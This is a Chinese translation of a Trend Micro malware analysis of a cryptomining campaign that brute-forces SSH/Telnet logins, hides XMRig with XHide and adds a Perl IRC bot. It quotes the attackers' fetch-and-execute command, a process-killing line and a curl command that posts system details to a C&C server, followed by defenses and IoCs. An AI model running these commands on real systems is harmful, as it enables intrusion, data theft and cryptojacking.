趨勢科技架設的某個誘捕環境在一個遭到入侵的網站 (hxxps://upajmeter[.]com/assets/.style/min) 上偵測到虛擬加密貨幣挖礦攻擊。歹徒在該網站上插入一些指令來下載其主要指令列腳本 (shell script),也就是趨勢科技偵測到的 Trojan.SH.MALXMR.UWEJS。這個挖礦程式由多個元件所組成,包括不同的 Perl 和 Bash 腳本、二進位檔案、應用程式隱藏工具 Xhide 以及一個掃瞄工具。此挖礦程式在散布時會掃瞄電腦是否含有某些漏洞,且會利用暴力登入方式 (主要是使用預設的登入帳號和密碼) 來入侵電腦。
根據我們對該威脅的分析顯示,惡意檔案會在一天當中執行多次,定期將受感染電腦的最新狀況回報給幕後操縱 (C&C) 伺服器。感染過程當中使用的指令列腳本也會下載一些包含其掃瞄工具、執行程序隱藏工具,以及最終惡意檔案的壓縮檔。
除此之外,這項威脅還會利用一個執行程序隱藏工具來隱藏挖礦程式的二進位檔案,讓一般使用者更不容易注意到歹徒的挖礦活動,頂多只會發現電腦效能變慢,以及某些可疑的網路流量。這是歹徒用來掩蓋其掃瞄、暴力登入與挖礦活動的一種已知手法。
老工具的賺錢新花招:惡意網址使用已有 17 年歷史的 XHide 來散播 Shellbot 和 XMRig 惡意程式
我們發現該威脅會掃瞄開放的連接埠,然後暴力登入密碼強度不足的系統,並在系統上安裝一個門羅幣 (Monero) 挖礦程式,最後下載一個以 Perl 撰寫的 IRC 後門程式。駭客利用 XHide Process Faker 來隱藏挖礦程式的執行程序,這是一個擁有 17 年歷史的開放原始碼工具,可用來變造執行程序的名稱。
感染過程
駭客一開始會先利用系統密碼強度不足或使用預設密碼的弱點來暴力登入系統。接著,就會在已登入的系統上執行一道指令:
cd /tmp;wget hxxps://upajmeter[.]com/assets/.style/min;curl
-O hxxps://upajmeter[.]com/assets/.style/min;chmod +x min;perl min;rm -rf min*
這個第一階段檔案「min」 (趨勢科技命名為 Trojan.Perl.MALXMR.UWEJS) 會下載另一個檔案「min.sh」(趨勢科技命名為Trojan.SH.MALXMR.UWEJS),也就是此威脅的主要指令列腳本,它會安裝此威脅的各項元件。在主要指令列腳本執行過後,駭客會試圖將系統上原本正在執行的各種已知挖礦程式全部終止:
killall -9 rand rx rd tsm tsm2 haiduc a
sparky.sh 2238Xae b f i p y rsync ps go x s b run idle minerd crond yam xmr
python cron ntpd start start.sh libssl sparky.sh
除此之外,指令列腳本會再下載並執行兩個檔案下載工具:「cron.sh」和「nano.sh」 (趨勢科技命名為 Trojan.SH.MALXMR.UWEJT),這兩個工具每天都會定期不斷執行,分別是每一小時和每 30 分鐘執行一次。它們會在系統植入「rcmd.sh」(趨勢科技命名為Trojan.SH.MALXMR.UWEJU),該腳本負責定期透過 HTTP 請求向 C&C 伺服器回報受感染電腦的狀況:
curl -d
"info=POST&data=SERVER---> $(whoami)@$SERVERIP
DATE---> $(date)
SERV---> $(uname -a) ===> $(nproc)
PROCESORS ===> VIDEO $(lspci | grep VGA) ===>$(ps x|grep bash)"
hxxp://upajmeter[.]com/assets/.style/remote/info.php > /dev/null
壓縮檔案
此外,該指令列腳本還會下載挖礦程式的壓縮檔案「monero.tgz」(趨勢科技命名為 Trojan.Linux.MALXMR.UWEJS) 並解開壓縮檔中的內容來執行。壓縮檔內含有挖礦程式的二進位檔案,可透過檔案中包含的指令列腳本及 Perl 腳本來執行。
此壓縮檔的內容主要是組態設定檔案以及各元件執行所需的檔案,如:「config.txt」、「cpu.txt」、「h32」(32 位元 Xhide 程式)、「h64」(64 位元 Xhide 程式)、「pools.txt」、「run」、「startMSR」、「x」、「x.pl」、「xmr-stak」以及「xmrig」。Xhide 程式可用來隱藏挖礦程式的執行程序 (透過「-bash」來修改執行程序名稱)。
接下來,主要指令列腳本會下載包含掃瞄工具的壓縮檔「sslm.tgz」(趨勢科技命名為 Trojan.Linux.SSHBRUTE.UWEJS) 並解開其中的掃瞄工具來執行。壓縮檔中含有 Telnet/SSH 掃瞄工具、用來執行該工具的指令列腳本與 Perl 腳本,以及掃瞄過程當中會用到的密碼清單。
經由 C&C 幕後操控,使用以 Perl 撰寫的 Shellbot 攻擊企業
根據我們發現,一個名為「haiduc」(羅馬尼亞文,意為「不法之徒」) 的駭客集團 (以該團體所使用的工具為名) 專門使用 Perl Shellbot 所製作的 IRC 殭屍病毒 (bot) 來攻擊企業。
前述的掃瞄工具壓縮檔內含有以下檔案:「.pass」(隨機公共 IP 區段短密碼清單)、「pass」(私人 IP 區段長密碼清單)、「libssl」(以 UPX 壓縮的 Haiduc 掃瞄工具)、「sparky.sh」、「start」、「start.pl」以及「start.sh」。
該掃瞄工具會試圖感染並掌控私人 IP 區段內的裝置 (此外也會試圖感染受害電腦所在區域網路內的所有裝置),利用一個含有 3,637 組使用名稱和密碼的清單來試圖暴力登入電腦。此外,它還會使用另一個短密碼清單來試圖感染公共 IP 區段「{0-216 之間的隨機數字}.0.0.0/8」內的裝置。根據其使用的帳號密碼來看,此攻擊主要針對的是資料庫、儲存裝置、遊戲以及挖礦專用設備相關的伺服器。
攻擊一旦得逞,駭客就能利用前述的指令在系統上挖礦。
保護裝置,防範虛擬加密貨幣挖礦威脅
這起虛擬加密貨幣挖礦攻擊幕後的駭客集團結合了 Haiduc 和 Xhide 兩個過去曾經相當知名的工具來從事惡意活動。利用這些工具,再配合密碼清單來暴力登入密碼強度不足的系統,就能躲避傳統網路資安解決方案的偵測。不僅如此,像這樣的惡意程式還可能影響系統效能,並讓使用者暴露於更多其他類型的入侵。
雖然我們尚未看到該集團發動大規模的攻擊,但使用者仍應採取一些防護措施來防範任何潛在的攻擊,包括:
- 小心防範已知攻擊管道,如:不請自來的電子郵件、社交工程連結與附件檔案、可疑的網站以及可疑的第三方應用程式。
- 變更裝置預設密碼以防止裝置遭人不當存取。
- 隨時套用最新修補更新。
- 定期檢查並確認所有帳號皆僅用於合法用途。
除此之外,使用者也可考慮採用一些資安解決方案,採用跨世代融合的防禦技巧協助您防範殭屍病毒相關活動。趨勢科技 XGen™ 防護提供了高準度機器學習來保護 閘道 和端點,涵蓋實體、虛擬以及雲端工作負載。XGen 防護利用網站/網址過濾、行為分析、客製化沙盒模擬分析等技術來防範隨時演變且能躲避傳統資安控管並攻擊已知及未知漏洞的威脅。此外,XGen™ 防護同時也是趨勢科技 Hybrid Cloud Security 混合雲防護、User Protection 使用者防護以及 Network Defense 網路防禦等解決方案的技術基礎。
採用 趨勢科技 Deep Discovery Inspector (DDI) 的用戶可利用以下規則來攔截挖礦與 C&C 連線的相關網路流量,進而防範這項威脅:
- Rule 2573: MINER – TCP (Request)
- Rule 4313 – MALXMR – HTTP (Request)
入侵指標 (IoC):
SHA-256
| 檔案名稱 | 雜湊碼 | 趨勢科技病毒碼偵測名稱 | 備註 |
| config.txt | 91a80ee885d7586292260750a4129ad305fe252a39002cbde546e8161873a906 | Trojan.Win32.MALXMR.BJ | 設定檔。 |
| cpu.txt | 60a1f3cf6a6a72e45bfb299839f25e872e016b6e1f9d465477224d0c6bb2d53a | Trojan.Win32.MALXMR.BJ | 設定檔。 |
| cron.sh | fee602278dee4cc23d5a6c19f10d1d45702a9bbc14e1a0b54af938dff3bef22e | Trojan.SH.MALXMR.UWEJT | 下載元件檔案。 |
| h32 | 45ed59d5b27d22567d91a65623d3b7f11726f55b497c383bc2d8d330e5e17161 | HackTool.Linux.XHide.GA | Xhide 二進位檔案 (32 位元)。 |
| h64 | 7fe9d6d8b9390020862ca7dc9e69c1e2b676db5898e4bfad51d66250e9af3eaf | HackTool.Linux.XHide.GA | Xhide 二進位檔案 (64 位元)。 |
| libssl | 6163a3ca3be7c3b6e8449722f316be66079207e493830c1cf4e114128f4fb6a4 | HackTool.Linux.SSHBRUTE.GA | Haiduc 掃瞄工具 (採用 UPX 壓縮)。 |
| min | 07f6e31ffab85fe561c6f39aa3cf62c71017b790ee8eb1b028579ef982e861ab | Trojan.Perl.MALXMR.UWEJS | 下載主要指令列腳本。 |
| min.sh | 3f36a82e37f8dc885bab158568d0df3b7857b830250fdf32be39a1dadea6f460 | Trojan.SH.MALXMR.UWEJS | 主要指令列腳本。 |
| monero.tgz | eb34d838d0b678dcc2f19140dc312680782e011b1b1ecb0f2ec890f5d3943544 | Trojan.Linux.MALXMR.UWEJS | 挖礦程式壓縮檔。 |
| nano.sh | fee602278dee4cc23d5a6c19f10d1d45702a9bbc14e1a0b54af938dff3bef22e | Trojan.SH.MALXMR.UWEJT | 下載元件檔案。 |
| pools.txt | cd590e2343810e17d5c96d8db76c11b4e08ad7b3c3ed5424965b9098f0308f57 | Trojan.Win32.MALXMR.BJ | 設定檔。 |
| rcmd.sh | 46dc8a5ba6f7dc9ce1f51039b434d53bd90bf19314f9c4b4238c23a29230ccff | Trojan.SH.MALXMR.UWEJU | 向 C&C 回報。 |
| run | 420aeb234ab803ac8e12250ce15c4c63870bbd68f6037ef68655187739429dc1 | Trojan.SH.MALXMR.UWEJW | 執行挖礦程式與執行程序隱藏元件。 |
| sparky.sh | 64a66a8254b45debc1d0efea6662e240d9832ef0667ce805d2b6aaa8ff90ce18 | Trojan.SH.SSHBRUTE.UWEJS | 執行掃瞄程式元件。 |
| sslm.tgz | 8cce20ac223b14200e8b1fc23bde114e19bfef5762d461156dad13f22ea25a5f | Trojan.Linux.SSHBRUTE.UWEJS | 掃瞄程式壓縮檔。 |
| start | 5725edd6ae0a832ec1f474caa78345761db630278459db17434d08876722659b | Trojan.SH.SSHBRUTE.UWEJS | 執行元件檔案。 |
| start.sh | d75bac897dfbdd5ed97775ae30e23a55695868c3e5702f449364400815f6a049 | Trojan.SH.SSHBRUTE.UWEJS | 執行元件檔案。 |
| startMSR | 473b58ed5e8667ff8ab54044ed8b070edb5a227837ffb28b992396dcb4a3aacb | Trojan.SH.MALXMR.UWEJW | 執行挖礦程式與執行程序隱藏元件。 |
| x | 78ea53a03343b0a471476b8e1f3fae6ef847ad097dd16be4628d650bce353e4d | Trojan.SH.MALXMR.UWEJS | 執行元件檔案。 |
| xmr-stak | 8269773c98c259acb7d109de1c448673d1e45b3684834b19335bd42c84977e4c | Coinminer.Linux.MALXMR.UWEKF | 挖礦程式二進位檔案。 |
| xmrig | e41b2012a4fdc58370f243f3dbb65ee5db12b007919528b0d4bd0d9b0f948abb | Coinminer.Linux.MALXMR.SMDSL64 | 挖礦程式二進位檔案。 |
相關惡意網址:
139[.]99[.]42[.]75:3333
pool[.]masari[.]hashvault[.]pro:3333
hxxps://upajmeter[.]com/assets/.style/min
hxxps://upajmeter[.]com/assets/.style/min.sh
hxxps://upajmeter[.]com/assets/.style/remote/cron.sh
hxxps://upajmeter[.]com/assets/.style/monero.tgz
hxxps://upajmeter[.]com/assets/.style/sslm.tgz
hxxps://upajmeter[.]com/assets/.style/remote/info.php
hxxps://upajmeter[.]com/assets/.style/remote/rcmd.sh
原文出處:Cryptocurrency Miner Uses Hacking Tool Haiduc and App Hider Xhide to Brute Force Machines and Servers 作者:Augusto Remillano II 與 Jemimah Molina (威脅分析師)